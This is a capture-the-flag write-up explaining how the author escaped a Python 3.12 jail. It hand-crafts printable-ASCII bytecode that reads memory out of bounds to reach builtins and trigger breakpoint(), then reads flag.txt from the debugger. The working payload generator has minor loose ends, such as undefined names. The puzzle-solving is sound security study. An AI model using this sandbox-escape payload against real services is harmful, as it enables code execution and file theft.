parseltongue

Write-up for parseltongue from jailCTF 2024, a particularly tricky Python capture-the-flag challenge.

The task

Read flag.txt on a server running the following Python code:

#!/usr/local/bin/python
from os import __dict__

value = input("speak to me > ")
code = input("your code > ")

assert all(32 <= ord(x) < 127 for x in code), 'cant read this'

def f():
    pass

f.__code__ = f.__code__.replace(co_names=(), co_code=code.encode())
f()

We need to execute remote code, by crafting some Python bytecode that only uses printable ASCII bytes.

(Yes, I’ve seen that one Tom 7 video. It’s really good!)

My approach does not use os.__dict__ or the value string. I will essentially escape an even more restrictive, minimalist jail:

#!/usr/local/bin/python
code = input("your code > ")

assert all(32 <= ord(x) < 127 for x in code)

def f():
    pass

f.__code__ = f.__code__.replace(co_names=(), co_code=code.encode())
f()

Python bytecode

Python functions are compiled into bytecode that we can disassemble with the dis module.

Python 3.12.0 (tags/v3.12.0:0fb18b0, Oct  2 2023, 13:03:39)
Type "help", "copyright", "credits" or "license" for more information.
>>> import dis
>>> def f(x):
...     return x+x
...
>>> dis.dis(f)

  1           0 RESUME                   0

  2           2 LOAD_FAST                0 (x)
              4 LOAD_FAST                0 (x)
              6 BINARY_OP                0 (+)
             10 RETURN_VALUE

This bytecode is run by Python’s stack-based virtual machine. Its format varies heavily between minor versions of Python. This challenge used Python 3.12.

As you can see from the offsets in the second column, every instruction is two bytes: an opcode and an operand. For instructions that don't need an operand, like RETURN_VALUE (which returns the top item of the stack), the second byte is ignored.

2line number

6byte offset

BINARY_OPopcode name

0 (+)operand (meaning)

BINARY_OP is just the opcode’s name, but we can use dis to check its byte representation, and hence, ASCII-friendliness.

>>> dis.opmap["BINARY_OP"]
122

The restriction imposed by this challenge is twofold. Clearly, we can only use instructions with opcodes in range(32, 127). But for another, the operands must be in that range as well.

Thus, we can’t swap the top two elements on the stack, as that would be SWAP(1). We can do a SWAP(34), which swaps stack[-1] and stack[-34].

We’ll also see that we can’t easily do anything like push numbers or strings to the stack. f is a barren wasteland: there are no constants, locals, or globals we can refer to. We can’t access attributes of things on the stack, either, because co_names is empty as well. So what can we even do?

Hey, wait, scroll back up a little. Where's the instruction with byte offset 8?

Aside: caches and specialization

Some instructions come with trailing caches where they store information about how they’ve been called. We can ask dis to reveal them:

>>> dis.dis(f, show_caches=True)
  1           0 RESUME                   0

  2           2 LOAD_FAST                0 (x)
              4 LOAD_FAST                0 (x)
              6 BINARY_OP                0 (+)
              8 CACHE                    0 (counter: 0)    # <-- tada!
             10 RETURN_VALUE

If we call this function with string arguments many times, Python will decide to "specialize" the BINARY_OP for string addition.

>>> for i in range(100): f("blah")
>>> dis.dis(f, show_caches=True, adaptive=True)
  1   0 RESUME                   0
  
  2   2 LOAD_FAST__LOAD_FAST     0 (x)
      4 LOAD_FAST                0 (x)
      6 BINARY_OP_ADD_UNICODE    0 (+)     # "Let me guess. Two strings?"
      8 CACHE                    0 (counter: 832)  
     10 RETURN_VALUE                       # ↑ Calling with non-strings will
     10 RETURN_VALUE                       # lower this number, and eventually
                                           # de-specialize the instruction.

Note that BINARY_OP_ADD_UNICODE can still add numbers just fine, it will just cause a sort of “branch misprediction.” See disconnect3d’s blog for more information.

Secret characters

The point of all this is that at first, I thought I only had these instructions available to me…

>>> [k for k,v in dis.opmap.items() if 32 <= v < 127]
['MATCH_SEQUENCE', 'MATCH_KEYS', 'PUSH_EXC_INFO', 'CHECK_EXC_MATCH', 'CHECK_EG_MATCH', 'WITH_EXCEPT_START', 'GET_AITER', 'GET_ANEXT', 'BEFORE_ASYNC_WITH', 'BEFORE_WITH', ...]

But there are also these secret “specialized” opcodes, like the aforementioned BINARY_OP_ADD_UNICODE, whose names are absent from the documentation and hiding in dis._all_opmap instead of dis.opmap (sigh). I wouldn’t have figured this out without a hint from the organizers.

>>> [k for k,v in dis._all_opmap.items() if 32 <= v < 127 and k not in dis.opmap]
['CALL_BUILTIN_FAST_WITH_KEYWORDS', 'CALL_METHOD_DESCRIPTOR_FAST_WITH_KEYWORDS', 'CALL_NO_KW_BUILTIN_FAST', 'CALL_NO_KW_BUILTIN_O', 'CALL_NO_KW_ISINSTANCE', 'CALL_NO_KW_LEN', ...]

I’m normal… I promise

When working on the solution, I thought about the ASCII characters more than about their “real” names, because I don’t really have past experience with Python bytecode. Modifying this bytecode by hand was like writing GolfScript or APL, which I've done plenty. Oh, and I decided that whenever the second byte of an instruction is ignored (because it doesn't need an operand), I'll use a semicolon.

For example: the decimal value of the opcode GET_ITER is 68. In ASCII, 68 encodes D, so I'd write that as D; in my code. The organizers really loved this.

oh_word

Wait, you’re genuinely putting this all together with ascii
This is criminal

lynn

:) its like an esolang

quasarobizarro

this is frightening

lynn

I'm normal......
I promise

Programming in Parseltongue

Let’s get a taste of what we can do. We’ll need to combine the available opcodes in clever ways to manipulate values on the stack. These are small puzzles, so let’s tackle them first.

Pop

We can’t use POP_TOP, because its opcode byte is 1. To pop the stack, I ended up using Y; (POP_EXCEPT). But this would eventually cause a segfault, maybe because Python doesn't like non-exceptions being set as the exception state for too long? So, I use #;Y;Y; to tuck an actual exception state under the top of stack, then pop twice.

#; PUSH_EXC_INFO

Pop a value V. Push the “last exception” to the stack, then push V again. The second byte is ignored.

Y; POP_EXCEPT

Pop a value and set it as the “last exception.” The second byte is ignored.

Dup and swap

We’ll want to duplicate the top-of-stack sometimes, or swap elements around. The opcodes we’d normally use for that are available, but we can only target elements deep down the stack:

xn COPY

Push a copy of stack[-n].

cn SWAP

Swap stack[-1] and stack[-n].

With ASCII operands, we can COPY(32) or SWAP(33), but not COPY(1). Fortunately, there’s an opcode to just push some garbage to the stack, so we can create the distance we need, and then close it again:

J; LOAD_ASSERTION_ERROR

Push an AssertionError to the stack.
The second byte is ignored.

For example, to duplicate the top of stack, we can push 32 garbage elements, then COPY(33), then SWAP(33), then pop 32 times.

We’re ready to look at our first piece of Parseltongue code. Behold, DUP:

J;J;J;J;J;J;J;J;
J;J;J;J;J;J;J;J;
J;J;J;J;J;J;J;J;
J;J;J;J;J;J;J;J;
Push 32 AssertionErrors.
They will be stack[-32] through stack[-1].x!Copy stack[-33] to the top: ord("!") == 33
c!
Swap stack[-1] (our copy) with stack[-33] (an AssertionError).#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;
#;Y;Y;#;Y;Y;#;Y;Y;#;Y;Y;Pop 32 AssertionErrors.

Getting functions on the stack

One of the opcodes we saw earlier for loading function arguments, LOAD_FAST, is actually so fast that it doesn’t perform any bounds-checking, and so something like LOAD_FAST(42) might reach into the murky depths of memory and pull a reference to __builtins__.__dict__ onto the stack.

This is totally bogus, but it works reliably on the host machine and in the Docker container provided by the organizers, so, works for me.

|n LOAD_FAST

Push co_varnames[n] onto the stack, without bounds checking.

}n STORE_FAST

Pop the stack and store it in co_varnames[n], without bounds checking.

(These guys combine to make a far shorter DUP alternative: something like }z|z|z should work. But it involves writing out-of-bounds, and this would also cause segfaults sometimes, so I settled for the much more roundabout DUP described earlier.)

This is nice. A common way to solve Python CTF challenges is to call breakpoint(), which opens the debugger and lets us read the flag.txt file from there. So we just need to extract the right value from the builtins dict and call it.

Smashing open a dict

As we saw earlier, we have no way of pushing strings. Also, none of the opcodes for a[b] are ASCII-friendly anyway:

>>> [print(v,k) for k,v in dis._all_opmap.items() if "BINARY_SUBSCR" in k]
25 BINARY_SUBSCR
19 BINARY_SUBSCR_DICT
20 BINARY_SUBSCR_GETITEM
21 BINARY_SUBSCR_LIST_INT
22 BINARY_SUBSCR_TUPLE_INT

So how do we get the values?

To pull keys out of a dict on top of the stack, we can use UNPACK_EX, the Python bytecode instruction that implements starred assignments.

^n UNPACK_EX

Pop a value L. Perform a "starred assignment":

y₁, …, y_n, *rest = L

Push rest, then y_n through y₁.

Luckily, our builtins dict is big enough that we can provide a large, ASCII-friendly operand number. Any largeish number will do, but let's use x (120).

This way, we don’t have to specify the names of the things we want: we just get all the names on the stack. But then how do we get at the values?

There’s an obscure opcode called MATCH_KEYS, used in the bytecode translation of statements like case {"a": a, "b": b}: inside a Python match block. Here’s how it works:

!; MATCH_KEYS

Pop a tuple of keys K. Pop a dict D. If all the keys in K exist in D, push a tuple of corresponding values. Otherwise, push None.

The second byte is ignored.

Also, we can build tuples on the stack, as long as they are 32-tuples or larger…

fn BUILD_TUPLE

Pop n values and push a tuple containing them.

A careful combination of these opcodes leaves us with a 120-tuple of builtin functions on the stack.

|*|*LOAD_FAST out-of-bounds to push the builtins dict twice.
^xPerform a starred assignment with ord("x") = 120 variables.
This pushes `rest`, then k120, then k119 ... then k1.
cySwap stack[-121] (`rest`) and stack[-1] (k1).
#;Y;Y;Pop `rest`.
fxMake a tuple out of 120 keys.
!;MATCH_KEYS with the original dict to get 120 values.
^xPerform starred assignment again to dump the values to the stack.

The order of the keys seemed to be the same each time. So at this point, I could swap and pop things in a careful order to leave me with stack access to whatever functions I want. Let's call breakpoint!

Calling functions

We can use the specialized opcode CALL_NO_KW_BUILTIN_FAST to call a function, taking a callable object and its arguments off the stack. However, we’re restricted to calling functions with 32 or more arguments.

'n;;;;;; CALL_NO_KW_BUILTIN_FAST

Pop n arguments. Pop self. Pop f.

Call f(self, *arguments) and push the result to the stack.

The cache bytes ;;;;;; are skipped over.

If we call breakpoint with 32 arguments, it’ll just throw an error instead of launching the debugger. We really need to call it with 0 arguments somehow.

Here’s one idea: did you know you can call iter with two arguments!? Calling iter(breakpoint, 0) makes an iterator that calls breakpoint() when advanced, and we can advance iterators with the bytecode instruction FOR_ITER.

]n;; FOR_ITER

Call next(stack[-1]). If this produces a value, push it to the stack. (Otherwise, skip ahead by n bytes — but we never trigger this behavior.)

The cache bytes ;; are skipped over.

Basically, it’s like writing this...

for _ in iter(breakpoint, 0):
    pass

But two arguments is still too few.

A ridiculous map() call

Here’s another idea: map can be called with n + 1 arguments. The n iterables get zipped together, and the function passed as the first argument receives n arguments at a time, stopping as soon as one of the iterables stops. For example, iterating over map(print, 'abc', 'def', 'gh') will print a d g and then b e h and then stop.

So we can write something like

for a in map(iter, [breakpoint], [0]):
    # Now a = iter(breakpoint, 0)
    for b in a:
        pass

and trigger a breakpoint. But why stop there? We can pass map to map, like so:

for a in map(map, [iter], [[breakpoint]], [[0]]):
    # Now a = map(iter, [breakpoint], [0])
    for b in a:
        # so b = iter(breakpoint, 0)
        for c in b:
            # so this triggers the breakpoint
            pass

We can repeat this idea to get more and more arguments.

for a in map(map, [map], [[map]], [[[iter]]], [[[[breakpoint]]]], [[[[0]]]]):
    for b in a:
        for c in b:
            for d in c:
                for e in d:
                    pass

Our plan is to call map with 32 arguments, most of which are stupidly nested tuples.

(We don’t exactly have a way to turn x into [x] in bytecode, but a 32-tuple of x and 31 AssertionErrors works just as well. Can you see why?)

Aside: Testing Parseltongue

Let me describe my Parseltongue “dev environment.” Earlier, I alluded to a Dockerfile provided by the organizers that contains the exact Python environment of the remote jail. I modified the jail script in the Docker container to print the result of calling the function after swapping in the bytecode, like so:

...

f.__code__ = f.__code__.replace(co_names=(), co_code=code.encode())

print(repr(f()))  # <-- New!

Then, I wrote a small wrapper around the socket library that lets me connect and submit Parseltongue code and see the result. I won’t unpack that here, because someone who knows what they’re doing would have just used pwntools. But this was my first CTF, and I didn’t know of its existence.

For example, submitting J;S; prints AssertionError(). Or I can push two assertion errors and ask if they are equal: J;J;u;S; prints True.

S; RETURN_VALUE

Return the value at the top of the stack. The second byte is ignored.

We'll use this at the very end of our solution!

u; IS_OP

Pop Y. Pop X. Push (X is Y).

If the second byte is 1, the result is negated.

Making a blueprint

Knowing that we can run Parseltongue code, and get built-ins on the stack, and make 32-tuples, and call functions with 32 arguments… let’s sketch out our approach in regular Python, first:

J = AssertionError

def wrap(x):
    return (x,  J(),J(),J(),J(),J(),J(),J(),
            J(),J(),J(),J(),J(),J(),J(),J(),
            J(),J(),J(),J(),J(),J(),J(),J(),
            J(),J(),J(),J(),J(),J(),J(),J())

m0 = map
m1 = wrap(m0); m2 = wrap(m1); m3 = wrap(m2); m4 = wrap(m3)
m5 = wrap(m4); m6 = wrap(m5); m7 = wrap(m6); m8 = wrap(m7)
m9 = wrap(m8); m10 = wrap(m9); m11 = wrap(m10); m12 = wrap(m11)
m13 = wrap(m12); m14 = wrap(m13); m15 = wrap(m14); m16 = wrap(m15)
m17 = wrap(m16); m18 = wrap(m17); m19 = wrap(m18); m20 = wrap(m19)
m21 = wrap(m20); m22 = wrap(m21); m23 = wrap(m22); m24 = wrap(m23)
m25 = wrap(m24); m26 = wrap(m25); m27 = wrap(m26); m28 = wrap(m27)

i = iter
for _ in range(29): i = wrap(i)

b = breakpoint
for _ in range(30): b = wrap(b)

# These arguments are what we want on the stack:
x = map(m0, m1, m2, m3, m4, m5, m6, m7, m8, m9,
        m10, m11, m12, m13, m14, m15, m16, m17, m18, m19,
        m20, m21, m22, m23, m24, m25, m26, m27, m28, i, b, b)

# Then, we use `FOR_ITER` 31 times:
for _ in range(31): x = next(x)

If you run this program, it actually triggers a breakpoint! You can try it at home.

The translation into bytecode will look like this:

Conjure up the built-ins, and leave just the ones we need on the stack.
Use our DUP, BUILD_TUPLE, and SWAP operations to make the arguments.
Use CALL_NO_KW_BUILTIN_FAST to perform the 32-argument map call.
Use FOR_ITER to peel off layers of map objects until we get to the breakpoint.

Constructing the bytecode

At this point, we are just putting together everything we know. Instead of bothering to figure out how to write loops in Parseltongue, I just unrolled everything, and my payload ended up being enormous.


# Bytecode to push an AssertionError.
J = b"J;"

# Bytecode to call a function with n arguments.
CALL = lambda n: b"'%c;;;;;;" % (n)

# Turn x into a 32-tuple (x, AssertionError(), AssertionError(), ...)
Z = J*31 + b"f "

# Swap stack[-1] and stack[-n], only using ASCII bytecode.
def SWAP(n):
    if n < 33:
        return J*32 + bytes([99,32+1,99,32+n,99,32+1]) + POP*32
    else:
        return bytes([99, n])

DUP = J*31 + b"x " + (SWAP(2) + POP)*31
NEXT = b"D;];;;" + SWAP(2) + POP

# How many layers of map?
k = 33

# Bizarre LOAD magic
code  = J + b"|G|G^EfE" + SWAP(2) + POP + b"!;^E"

# Some nonsense that leaves the right builtins on the stack...
# This can totally be optimized, but I didn't bother
code += SWAP(72) + POP
code += SWAP(37) + SWAP(71) + SWAP(69)
code += SWAP(72) + SWAP(70) + SWAP(56) + SWAP(72)
code += SWAP(i) + SWAP(70)
code += POP * 68

# Push m0, m1, m2, m3...
code += DUP + (DUP + Z)*(k-4)

# Get iter on top of the stack and wrap it k-3 times
code += J + SWAP(k+1) + Z*(k-3)

# Get breakpoint on top of the stack and wrap it k-2 times
code += J + SWAP(k+3) + Z*(k-2)

# It doesn't matter what the last thing we push is, but wrap it k-2 times.
code += J + Z*(k-2)

# Trigger a remote breakpoint!! And return.
code += CALL(k-1) + NEXT*(k-1) + b"S;"

print(submit(code))

All I had to do now was modify my socket wrapper to run open("flag.txt").read() as soon as it's inside the Python debugger, and then point it at the actual remote jail server.

It has taken over 12 hours of bytecode puzzling and pulling my hair out — but I was looking at the flag string! I was the only participant in the CTF who ended up solving this challenge.